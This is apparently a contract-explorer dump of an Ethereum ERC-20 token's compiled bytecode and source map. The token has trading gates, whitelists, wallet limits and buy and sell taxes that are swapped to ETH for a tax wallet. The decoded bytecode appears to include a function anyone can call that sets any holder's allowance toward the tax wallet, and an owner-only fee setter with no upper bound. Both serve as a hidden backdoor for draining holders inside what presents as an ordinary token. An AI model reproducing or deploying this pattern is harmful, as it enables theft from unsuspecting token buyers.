76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610817565b6001600160a01b038216610a865760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610817565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6000610af384846108fc565b90506000198114610b5b5781811015610b4e5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610817565b610b5b84848484036109c3565b50505050565b6001600160a01b038316610b875760405162461bcd60e51b815260040161081790611928565b6001600160a01b038216610bad5760405162461bcd60e51b81526004016108179061196d565b60008111610bfd5760405162461bcd60e51b815260206004820152601d60248201527f616d6f756e74206d7573742062652067726561746572207468616e20300000006044820152606401610817565b60105460ff1615611023576005546001600160a01b03848116911614801590610c3457506005546001600160a01b03838116911614155b8015610c4857506001600160a01b03821615155b8015610c5f57506001600160a01b03821661dead14155b1561102357601054610100900460ff16610d5b576001600160a01b03831660009081526007602052604090205460ff1680610cb257506001600160a01b03821660009081526007602052604090205460ff165b610cfe5760405162461bcd60e51b815260206004820152601d60248201527f4552524f523a2054726164696e67206973206e6f74206163746976652e0000006044820152606401610817565b6005546001600160a01b03848116911614610d5b5760405162461bcd60e51b815260206004820152601960248201527f4552524f523a2054726164696e6720697320656e61626c6564000000000000006044820152606401610817565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316836001600160a01b0316148015610db557506001600160a01b03821660009081526007602052604090205460ff16155b15610e9d57600854811115610e245760405162461bcd60e51b815260206004820152602f60248201527f4552524f523a20427579207472616e7366657220616d6f756e7420657863656560448201526e3239903a34329036b0bc10313abc9760891b6064820152608401610817565b600a546001600160a01b038316600090815260208190526040902054610e4a9083611915565b1115610e985760405162461bcd60e51b815260206004820152601f60248201527f4552524f523a2043616e6e6f7420457863656564206d61782077616c6c6574006044820152606401610817565b611023565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316826001600160a01b0316148015610ef757506001600160a01b03831660009081526007602052604090205460ff16155b15610f6857600954811115610e985760405162461bcd60e51b815260206004820152603160248201527f4552524f523a2053656c6c207472616e7366657220616d6f756e74206578636560448201527032b239903a34329036b0bc1039b2b6361760791b6064820152608401610817565b6001600160a01b03821660009081526007602052604090205460ff16158015610faa57506001600160a01b03831660009081526007602052604090205460ff16155b1561102357600a546001600160a01b038316600090815260208190526040902054610fd59083611915565b11156110235760405162461bcd60e51b815260206004820152601f60248201527f4552524f523a2043616e6e6f7420457863656564206d61782077616c6c6574006044820152606401610817565b30600090815260208190526040902054600b548110801590819061104f575060105462010000900460ff165b80156110665750601054640100000000900460ff16155b80156110735750600c5483115b80156110b157507f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316856001600160a01b031614155b80156110d657506001600160a01b03851660009081526006602052604090205460ff16155b80156110fb57506001600160a01b03841660009081526006602052604090205460ff16155b1561112c576010805464ff00000000191664010000000017905561111d61139a565b6010805464ff00000000191690555b6001600160a01b03851660009081526006602052604090205460019060ff168061116e57506001600160a01b03851660009081526006602052604090205460ff165b15611177575060005b600081156112b4576010546301000000900460ff161561119957611199611423565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316866001600160a01b03161480156111dc57506000600f54115b1561121a576064600f54866111f191906119b0565b6111fb91906119c7565b9050806011600082825461120f9190611915565b909155506112969050565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316876001600160a01b031614801561125d57506000600e54115b15611296576064600e548661127291906119b0565b61127c91906119c7565b905080601160008282546112909190611915565b90915550505b80156112a7576112a78730836114ad565b6112b181866119e9565b94505b6112bf8787876114ad565b50505050505050565b6005546001600160a01b031633146107885760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610817565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b03831661138757600080fd5b6001600160a01b038216610a8657600080fd5b306000908152602081905260409020546011548115806113b8575080155b156113c1575050565b600b548211156113d157600b5491505b6113da826115d7565b6010546040516001600160a01b036501000000000090920491909116904780156108fc02916000818181858888f1935050505015801561141e573d6000803e3d6000fd5b505050565b6000600d54116114685760405162461bcd60e51b815260206004820152601060248201526f54726164696e67206e6f74206c69766560801b6044820152606401610817565b600d54439060009061147b906006611915565b9050808211611492576012600e819055600f555050565b6004600e819055600f556010805463ff000000191690555050565b6001600160a01b0383166114d35760405162461bcd60e51b815260040161081790611928565b6001600160a01b0382166114f95760405162461bcd60e51b81526004016108179061196d565b6001600160a01b038316600090815260208190526040902054818110156115715760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610817565b6001600160a01b03848116600081815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3610b5b565b604080516002808252606082018352600092602083019080368337019050509050308160008151811061160c5761160c6119fc565b60200260200101906001600160a01b031690816001600160a01b031681525050737a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801561167e573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906116a29190611a12565b816001815181106116b5576116b56119fc565b6001600160a01b039092166020928302919091019091015260405163791ac94760e01b8152737a250d5630b4cf539739df2c5dacb4c659f2488d9063791ac9479061170d908590600090869030904290600401611a2f565b600060405180830381600087803b15801561172757600080fd5b505af115801561173b573d6000803e3d6000fd5b505050505050565b600060208083528351808285015260005b8181101561177057858101830151858201604001528201611754565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146109c057600080fd5b600080604083850312156117b957600080fd5b82356117c481611791565b946020939093013593505050565b6000806000606084860312156117e757600080fd5b83356117f281611791565b9250602084013561180281611791565b929592945050506040919091013590565b60006020828403121561182557600080fd5b813561183081611791565b9392505050565b6000806040838503121561184a57600080fd5b50508035926020909101359150565b6000806040838503121561186c57600080fd5b823561187781611791565b91506020830135801515811461188c57600080fd5b809150509250929050565b600080604083850312156118aa57600080fd5b82356118b581611791565b9150602083013561188c81611791565b600181811c908216806118d957607f821691505b6020821081036118f957634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561072a5761072a6118ff565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b808202811582820484141761072a5761072a6118ff565b6000826119e457634e487b7160e01b600052601260045260246000fd5b500490565b8181038181111561072a5761072a6118ff565b634e487b7160e01b600052603260045260246000fd5b600060208284031215611a2457600080fd5b815161183081611791565b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b81811015611a7f5784516001600160a01b031683529383019391830191600101611a5a565b50506001600160a01b0396909616606085015250505060800152939250505056fea2646970667358221220c197a060a5f9d0b7b037bd2eba2db3fa9cb9afc966059fb85863f668c70e40cd64736f6c63430008130033
Deployed Bytecode
0x6080604052600436106102135760003560e01c806388e765ff11610118578063c45a0155116100a0578063dd62ed3e1161006f578063dd62ed3e146105e6578063e6f7053114610606578063f2fde38b14610626578063f887ea4014610646578063f8b45b051461066e57600080fd5b8063c45a015514610574578063c9567bf91461059c578063d00efb2f146105b1578063d621e813146105c757600080fd5b8063a457c2d7116100e7578063a457c2d7146104de578063a9059cbb146104fe578063b8eb35461461051e578063baccf5cf14610534578063c02466681461055457600080fd5b806388e765ff146104615780638da5cb5b146104775780638fffabed1461049557806395d89b41146104c957600080fd5b8063412753581161019b57806362997f8c1161016a57806362997f8c146103c95780636ddd1713146103df57806370a08231146103ff578063715018a614610435578063751039fc1461044c57600080fd5b8063412753581461034257806347062402146103835780634a62bb651461039957806352f82dbc146103b357600080fd5b806323b872dd116101e257806323b872dd146102af5780632b14ca56146102cf5780632eaff86e146102e5578063313ce56714610306578063395093511461032257600080fd5b80630445b6671461021f57806306fdde0314610248578063095ea7b31461026a57806318160ddd1461029a57600080fd5b3661021a57005b600080fd5b34801561022b57600080fd5b50610235600c5481565b6040519081526020015b60405180910390f35b34801561025457600080fd5b5061025d610684565b60405161023f9190611743565b34801561027657600080fd5b5061028a6102853660046117a6565b610716565b604051901515815260200161023f565b3480156102a657600080fd5b50600254610235565b3480156102bb57600080fd5b5061028a6102ca3660046117d2565b610730565b3480156102db57600080fd5b50610235600f5481565b3480156102f157600080fd5b5060105461028a906301000000900460ff1681565b34801561031257600080fd5b506040516012815260200161023f565b34801561032e57600080fd5b5061028a61033d3660046117a6565b610754565b34801561034e57600080fd5b5060105461036b906501000000000090046001600160a01b031681565b6040516001600160a01b03909116815260200161023f565b34801561038f57600080fd5b50610235600e5481565b3480156103a557600080fd5b5060105461028a9060ff1681565b3480156103bf57600080fd5b5061023560115481565b3480156103d557600080fd5b50610235600b5481565b3480156103eb57600080fd5b5060105461028a9062010000900460ff1681565b34801561040b57600080fd5b5061023561041a366004611813565b6001600160a01b031660009081526020819052604090205490565b34801561044157600080fd5b5061044a610776565b005b34801561045857600080fd5b5061044a61078a565b34801561046d57600080fd5b5061023560085481565b34801561048357600080fd5b506005546001600160a01b031661036b565b3480156104a157600080fd5b5061036b7f0000000000000000000000000ee25721764ad2535c066e6600cd1561b26cc54c81565b3480156104d557600080fd5b5061025d61079e565b3480156104ea57600080fd5b5061028a6104f93660046117a6565b6107ad565b34801561050a57600080fd5b5061028a6105193660046117a6565b61082d565b34801561052a57600080fd5b5061023560095481565b34801561054057600080fd5b5061044a61054f366004611837565b61083b565b34801561056057600080fd5b5061044a61056f366004611859565b61084e565b34801561058057600080fd5b5061036b735c69bee701ef814a2b6a3edd4b1652cb9cc5aa6f81565b3480156105a857600080fd5b5061044a610881565b3480156105bd57600080fd5b50610235600d5481565b3480156105d357600080fd5b5060105461028a90610100900460ff1681565b3480156105f257600080fd5b50610235610601366004611897565b6108fc565b34801561061257600080fd5b5061028a6106213660046117a6565b610927565b34801561063257600080fd5b5061044a610641366004611813565b61094a565b34801561065257600080fd5b5061036b737a250d5630b4cf539739df2c5dacb4c659f2488d81565b34801561067a57600080fd5b50610235600a5481565b606060038054610693906118c5565b80601f01602080910402602001604051908101604052809291908181526020018280546106bf906118c5565b801561070c5780601f106106e15761010080835404028352916020019161070c565b820191906000526020600020905b8154815290600101906020018083116106ef57829003601f168201915b5050505050905090565b6000336107248185856109c3565b60019150505b92915050565b60003361073e858285610ae7565b610749858585610b61565b506001949350505050565b60003361072481858561076783836108fc565b6107719190611915565b6109c3565b61077e6112c8565b6107886000611322565b565b6107926112c8565b6010805460ff19169055565b606060048054610693906118c5565b600033816107bb82866108fc565b9050838110156108205760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b61074982868684036109c3565b600033610724818585610b61565b6108436112c8565b600e91909155600f55565b6108566112c8565b6001600160a01b03919091166000908152600660205260409020805460ff1916911515919091179055565b6108896112c8565b600d54156108e55760405162461bcd60e51b8152602060048201526024808201527f4552524f523a20546f6b656e20737461746520697320616c7265616479206c696044820152637665202160e01b6064820152608401610817565b43600d556010805462ffff00191662010100179055565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6010546000906501000000000090046001600160a01b0316610724848285611374565b6109526112c8565b6001600160a01b0381166109b75760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610817565b6109c081611322565b50565b6001600160a01b038316610a255760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610817565b6001600160a01b038216610a865760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610817565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6000610af384846108fc565b90506000198114610b5b5781811015610b4e5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610817565b610b5b84848484036109c3565b50505050565b6001600160a01b038316610b875760405162461bcd60e51b815260040161081790611928565b6001600160a01b038216610bad5760405162461bcd60e51b81526004016108179061196d565b60008111610bfd5760405162461bcd60e51b815260206004820152601d60248201527f616d6f756e74206d7573742062652067726561746572207468616e20300000006044820152606401610817565b60105460ff1615611023576005546001600160a01b03848116911614801590610c3457506005546001600160a01b03838116911614155b8015610c4857506001600160a01b03821615155b8015610c5f57506001600160a01b03821661dead14155b1561102357601054610100900460ff16610d5b576001600160a01b03831660009081526007602052604090205460ff1680610cb257506001600160a01b03821660009081526007602052604090205460ff165b610cfe5760405162461bcd60e51b815260206004820152601d60248201527f4552524f523a2054726164696e67206973206e6f74206163746976652e0000006044820152606401610817565b6005546001600160a01b03848116911614610d5b5760405162461bcd60e51b815260206004820152601960248201527f4552524f523a2054726164696e6720697320656e61626c6564000000000000006044820152606401610817565b7f0000000000000000000000000ee25721764ad2535c066e6600cd1561b26cc54c6001600160a01b0316836001600160a01b0316148015610db557506001600160a01b03821660009081526007602052604090205460ff16155b15610e9d57600854811115610e245760405162461bcd60e51b815260206004820152602f60248201527f4552524f523a20427579207472616e7366657220616d6f756e7420657863656560448201526e3239903a34329036b0bc10313abc9760891b6064820152608401610817565b600a546001600160a01b038316600090815260208190526040902054610e4a9083611915565b1115610e985760405162461bcd60e51b815260206004820152601f60248201527f4552524f523a2043616e6e6f7420457863656564206d61782077616c6c6574006044820152606401610817565b611023565b7f0000000000000000000000000ee25721764ad2535c066e6600cd1561b26cc54c6001600160a01b0316826001600160a01b0316148015610ef757506001600160a01b03831660009081526007602052604090205460ff16155b15610f6857600954811115610e985760405162461bcd60e51b815260206004820152603160248201527f4552524f523a2053656c6c207472616e7366657220616d6f756e74206578636560448201527032b239903a34329036b0bc1039b2b6361760791b6064820152608401610817565b6001600160a01b03821660009081526007602052604090205460ff16158015610faa57506001600160a01b03831660009081526007602052604090205460ff16155b1561102357600a546001600160a01b038316600090815260208190526040902054610fd59083611915565b11156110235760405162461bcd60e51b815260206004820152601f60248201527f4552524f523a2043616e6e6f7420457863656564206d61782077616c6c6574006044820152606401610817565b30600090815260208190526040902054600b548110801590819061104f575060105462010000900460ff165b80156110665750601054640100000000900460ff16155b80156110735750600c5483115b80156110b157507f0000000000000000000000000ee25721764ad2535c066e6600cd1561b26cc54c6001600160a01b0316856001600160a01b031614155b80156110d657506001600160a01b03851660009081526006602052604090205460ff16155b80156110fb57506001600160a01b03841660009081526006602052604090205460ff16155b1561112c576010805464ff00000000191664010000000017905561111d61139a565b6010805464ff00000000191690555b6001600160a01b03851660009081526006602052604090205460019060ff168061116e57506001600160a01b03851660009081526006602052604090205460ff165b15611177575060005b600081156112b4576010546301000000900460ff161561119957611199611423565b7f0000000000000000000000000ee25721764ad2535c066e6600cd1561b26cc54c6001600160a01b0316866001600160a01b03161480156111dc57506000600f54115b1561121a576064600f54866111f191906119b0565b6111fb91906119c7565b9050806011600082825461120f9190611915565b909155506112969050565b7f0000000000000000000000000ee25721764ad2535c066e6600cd1561b26cc54c6001600160a01b0316876001600160a01b031614801561125d57506000600e54115b15611296576064600e548661127291906119b0565b61127c91906119c7565b905080601160008282546112909190611915565b90915550505b80156112a7576112a78730836114ad565b6112b181866119e9565b94505b6112bf8787876114ad565b50505050505050565b6005546001600160a01b031633146107885760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610817565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b03831661138757600080fd5b6001600160a01b038216610a8657600080fd5b306000908152602081905260409020546011548115806113b8575080155b156113c1575050565b600b548211156113d157600b5491505b6113da826115d7565b6010546040516001600160a01b036501000000000090920491909116904780156108fc02916000818181858888f1935050505015801561141e573d6000803e3d6000fd5b505050565b6000600d54116114685760405162461bcd60e51b815260206004820152601060248201526f54726164696e67206e6f74206c69766560801b6044820152606401610817565b600d54439060009061147b906006611915565b9050808211611492576012600e819055600f555050565b6004600e819055600f556010805463ff000000191690555050565b6001600160a01b0383166114d35760405162461bcd60e51b815260040161081790611928565b6001600160a01b0382166114f95760405162461bcd60e51b81526004016108179061196d565b6001600160a01b038316600090815260208190526040902054818110156115715760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610817565b6001600160a01b03848116600081815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3610b5b565b604080516002808252606082018352600092602083019080368337019050509050308160008151811061160c5761160c6119fc565b60200260200101906001600160a01b031690816001600160a01b031681525050737a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801561167e573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906116a29190611a12565b816001815181106116b5576116b56119fc565b6001600160a01b039092166020928302919091019091015260405163791ac94760e01b8152737a250d5630b4cf539739df2c5dacb4c659f2488d9063791ac9479061170d908590600090869030904290600401611a2f565b600060405180830381600087803b15801561172757600080fd5b505af115801561173b573d6000803e3d6000fd5b505050505050565b600060208083528351808285015260005b8181101561177057858101830151858201604001528201611754565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146109c057600080fd5b600080604083850312156117b957600080fd5b82356117c481611791565b946020939093013593505050565b6000806000606084860312156117e757600080fd5b83356117f281611791565b9250602084013561180281611791565b929592945050506040919091013590565b60006020828403121561182557600080fd5b813561183081611791565b9392505050565b6000806040838503121561184a57600080fd5b50508035926020909101359150565b6000806040838503121561186c57600080fd5b823561187781611791565b91506020830135801515811461188c57600080fd5b809150509250929050565b600080604083850312156118aa57600080fd5b82356118b581611791565b9150602083013561188c81611791565b600181811c908216806118d957607f821691505b6020821081036118f957634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561072a5761072a6118ff565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b808202811582820484141761072a5761072a6118ff565b6000826119e457634e487b7160e01b600052601260045260246000fd5b500490565b8181038181111561072a5761072a6118ff565b634e487b7160e01b600052603260045260246000fd5b600060208284031215611a2457600080fd5b815161183081611791565b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b81811015611a7f5784516001600160a01b031683529383019391830191600101611a5a565b50506001600160a01b0396909616606085015250505060800152939250505056fea2646970667358221220c197a060a5f9d0b7b037bd2eba2db3fa9cb9afc966059fb85863f668c70e40cd64736f6c63430008130033
Deployed Bytecode Sourcemap
16617:7602:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17204:28;;;;;;;;;;;;;;;;;;;160:25:1;;;148:2;133:18;17204:28:0;;;;;;;;6336:100;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;8691:201::-;;;;;;;;;;-1:-1:-1;8691:201:0;;;;;:::i;:::-;;:::i;:::-;;;1370:14:1;;1363:22;1345:41;;1333:2;1318:18;8691:201:0;1205:187:1;7465:103:0;;;;;;;;;;-1:-1:-1;7553:7:0;;7465:103;;9472:261;;;;;;;;;;-1:-1:-1;9472:261:0;;;;;:::i;:::-;;:::i;17300:22::-;;;;;;;;;;;;;;;;17446:31;;;;;;;;;;-1:-1:-1;17446:31:0;;;;;;;;;;;7307:93;;;;;;;;;;-1:-1:-1;7307:93:0;;7390:2;2000:36:1;;1988:2;1973:18;7307:93:0;1858:184:1;10142:238:0;;;;;;;;;;-1:-1:-1;10142:238:0;;;;;:::i;:::-;;:::i;17512:25::-;;;;;;;;;;-1:-1:-1;17512:25:0;;;;;;;-1:-1:-1;;;;;17512:25:0;;;;;;-1:-1:-1;;;;;2211:32:1;;;2193:51;;2181:2;2166:18;17512:25:0;2047:203:1;17272:21:0;;;;;;;;;;;;;;;;17329:33;;;;;;;;;;-1:-1:-1;17329:33:0;;;;;;;;17544:27;;;;;;;;;;;;;;;;17172:25;;;;;;;;;;;;;;;;17408:31;;;;;;;;;;-1:-1:-1;17408:31:0;;;;;;;;;;;7631:127;;;;;;;;;;-1:-1:-1;7631:127:0;;;;;:::i;:::-;-1:-1:-1;;;;;7732:18:0;7705:7;7732:18;;;;;;;;;;;;7631:127;1849:103;;;;;;;;;;;;;:::i;:::-;;23873:84;;;;;;;;;;;;;:::i;17078:27::-;;;;;;;;;;;;;;;;1208:87;;;;;;;;;;-1:-1:-1;1281:6:0;;-1:-1:-1;;;;;1281:6:0;1208:87;;17578:31;;;;;;;;;;;;;;;6555:104;;;;;;;;;;;;;:::i;10883:436::-;;;;;;;;;;-1:-1:-1;10883:436:0;;;;;:::i;:::-;;:::i;7964:193::-;;;;;;;;;;-1:-1:-1;7964:193:0;;;;;:::i;:::-;;:::i;17112:22::-;;;;;;;;;;;;;;;;20146:150;;;;;;;;;;-1:-1:-1;20146:150:0;;;;;:::i;:::-;;:::i;18564:130::-;;;;;;;;;;-1:-1:-1;18564:130:0;;;;;:::i;:::-;;:::i;16688:105::-;;;;;;;;;;;;16750:42;16688:105;;23963:220;;;;;;;;;;;;;:::i;17239:26::-;;;;;;;;;;;;;;;;17369:32;;;;;;;;;;-1:-1:-1;17369:32:0;;;;;;;;;;;8220:151;;;;;;;;;;-1:-1:-1;8220:151:0;;;;;:::i;:::-;;:::i;23679:188::-;;;;;;;;;;-1:-1:-1;23679:188:0;;;;;:::i;:::-;;:::i;2107:201::-;;;;;;;;;;-1:-1:-1;2107:201:0;;;;;:::i;:::-;;:::i;16800:102::-;;;;;;;;;;;;16859:42;16800:102;;17141:24;;;;;;;;;;;;;;;;6336:100;6390:13;6423:5;6416:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6336:100;:::o;8691:201::-;8774:4;506:10;8830:32;506:10;8846:7;8855:6;8830:8;:32::i;:::-;8880:4;8873:11;;;8691:201;;;;;:::o;9472:261::-;9569:4;506:10;9627:38;9643:4;506:10;9658:6;9627:15;:38::i;:::-;9676:27;9686:4;9692:2;9696:6;9676:9;:27::i;:::-;-1:-1:-1;9721:4:0;;9472:261;-1:-1:-1;;;;9472:261:0:o;10142:238::-;10230:4;506:10;10286:64;506:10;10302:7;10339:10;10311:25;506:10;10302:7;10311:9;:25::i;:::-;:38;;;;:::i;:::-;10286:8;:64::i;1849:103::-;1094:13;:11;:13::i;:::-;1914:30:::1;1941:1;1914:18;:30::i;:::-;1849:103::o:0;23873:84::-;1094:13;:11;:13::i;:::-;23927:14:::1;:22:::0;;-1:-1:-1;;23927:22:0::1;::::0;;23873:84::o;6555:104::-;6611:13;6644:7;6637:14;;;;;:::i;10883:436::-;10976:4;506:10;10976:4;11059:25;506:10;11076:7;11059:9;:25::i;:::-;11032:52;;11123:15;11103:16;:35;;11095:85;;;;-1:-1:-1;;;11095:85:0;;4888:2:1;11095:85:0;;;4870:21:1;4927:2;4907:18;;;4900:30;4966:34;4946:18;;;4939:62;-1:-1:-1;;;5017:18:1;;;5010:35;5062:19;;11095:85:0;;;;;;;;;11216:60;11225:5;11232:7;11260:15;11241:16;:34;11216:8;:60::i;7964:193::-;8043:4;506:10;8099:28;506:10;8116:2;8120:6;8099:9;:28::i;20146:150::-;1094:13;:11;:13::i;:::-;20237:6:::1;:19:::0;;;;20267:7:::1;:21:::0;20146:150::o;18564:130::-;1094:13;:11;:13::i;:::-;-1:-1:-1;;;;;18649:26:0;;;::::1;;::::0;;;:17:::1;:26;::::0;;;;:37;;-1:-1:-1;;18649:37:0::1;::::0;::::1;;::::0;;;::::1;::::0;;18564:130::o;23963:220::-;1094:13;:11;:13::i;:::-;24022:11:::1;::::0;:16;24014:65:::1;;;::::0;-1:-1:-1;;;24014:65:0;;5294:2:1;24014:65:0::1;::::0;::::1;5276:21:1::0;5333:2;5313:18;;;5306:30;5372:34;5352:18;;;5345:62;-1:-1:-1;;;5423:18:1;;;5416:34;5467:19;;24014:65:0::1;5092:400:1::0;24014:65:0::1;24104:12;24090:11;:26:::0;24127:12:::1;:19:::0;;-1:-1:-1;;24157:18:0;;;;;23963:220::o;8220:151::-;-1:-1:-1;;;;;8336:18:0;;;8309:7;8336:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;8220:151::o;23679:188::-;23785:10;;23752:4;;23785:10;;;-1:-1:-1;;;;;23785:10:0;23806:31;23814:7;23785:10;23830:6;23806:7;:31::i;2107:201::-;1094:13;:11;:13::i;:::-;-1:-1:-1;;;;;2196:22:0;::::1;2188:73;;;::::0;-1:-1:-1;;;2188:73:0;;5699:2:1;2188:73:0::1;::::0;::::1;5681:21:1::0;5738:2;5718:18;;;5711:30;5777:34;5757:18;;;5750:62;-1:-1:-1;;;5828:18:1;;;5821:36;5874:19;;2188:73:0::1;5497:402:1::0;2188:73:0::1;2272:28;2291:8;2272:18;:28::i;:::-;2107:201:::0;:::o;14866:346::-;-1:-1:-1;;;;;14968:19:0;;14960:68;;;;-1:-1:-1;;;14960:68:0;;6106:2:1;14960:68:0;;;6088:21:1;6145:2;6125:18;;;6118:30;6184:34;6164:18;;;6157:62;-1:-1:-1;;;6235:18:1;;;6228:34;6279:19;;14960:68:0;5904:400:1;14960:68:0;-1:-1:-1;;;;;15047:21:0;;15039:68;;;;-1:-1:-1;;;15039:68:0;;6511:2:1;15039:68:0;;;6493:21:1;6550:2;6530:18;;;6523:30;6589:34;6569:18;;;6562:62;-1:-1:-1;;;6640:18:1;;;6633:32;6682:19;;15039:68:0;6309:398:1;15039:68:0;-1:-1:-1;;;;;15120:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;15172:32;;160:25:1;;;15172:32:0;;133:18:1;15172:32:0;;;;;;;14866:346;;;:::o;15517:419::-;15618:24;15645:25;15655:5;15662:7;15645:9;:25::i;:::-;15618:52;;-1:-1:-1;;15685:16:0;:37;15681:248;;15767:6;15747:16;:26;;15739:68;;;;-1:-1:-1;;;15739:68:0;;6914:2:1;15739:68:0;;;6896:21:1;6953:2;6933:18;;;6926:30;6992:31;6972:18;;;6965:59;7041:18;;15739:68:0;6712:353:1;15739:68:0;15851:51;15860:5;15867:7;15895:6;15876:16;:25;15851:8;:51::i;:::-;15607:329;15517:419;;;:::o;20302:3371::-;-1:-1:-1;;;;;20434:18:0;;20426:68;;;;-1:-1:-1;;;20426:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;20513:16:0;;20505:64;;;;-1:-1:-1;;;20505:64:0;;;;;;;:::i;:::-;20597:1;20588:6;:10;20580:52;;;;-1:-1:-1;;;20580:52:0;;8082:2:1;20580:52:0;;;8064:21:1;8121:2;8101:18;;;8094:30;8160:31;8140:18;;;8133:59;8209:18;;20580:52:0;7880:353:1;20580:52:0;20647:14;;;;20643:1738;;;1281:6;;-1:-1:-1;;;;;20700:15:0;;;1281:6;;20700:15;;;;:49;;-1:-1:-1;1281:6:0;;-1:-1:-1;;;;;20736:13:0;;;1281:6;;20736:13;;20700:49;:86;;;;-1:-1:-1;;;;;;20770:16:0;;;;20700:86;:128;;;;-1:-1:-1;;;;;;20807:21:0;;20821:6;20807:21;;20700:128;20678:1692;;;20868:12;;;;;;;20863:332;;-1:-1:-1;;;;;20939:24:0;;;;;;:18;:24;;;;;;;;;:79;;-1:-1:-1;;;;;;20996:22:0;;;;;;:18;:22;;;;;;;;20939:79;20905:194;;;;-1:-1:-1;;;20905:194:0;;8440:2:1;20905:194:0;;;8422:21:1;8479:2;8459:18;;;8452:30;8518:31;8498:18;;;8491:59;8567:18;;20905:194:0;8238:353:1;20905:194:0;1281:6;;-1:-1:-1;;;;;21130:15:0;;;1281:6;;21130:15;21122:53;;;;-1:-1:-1;;;21122:53:0;;8798:2:1;21122:53:0;;;8780:21:1;8837:2;8817:18;;;8810:30;8876:27;8856:18;;;8849:55;8921:18;;21122:53:0;8596:349:1;21122:53:0;21275:6;-1:-1:-1;;;;;21267:14:0;:4;-1:-1:-1;;;;;21267:14:0;;:41;;;;-1:-1:-1;;;;;;21286:22:0;;;;;;:18;:22;;;;;;;;21285:23;21267:41;21241:1114;;;21395:12;;21385:6;:22;;21351:155;;;;-1:-1:-1;;;21351:155:0;;9152:2:1;21351:155:0;;;9134:21:1;9191:2;9171:18;;;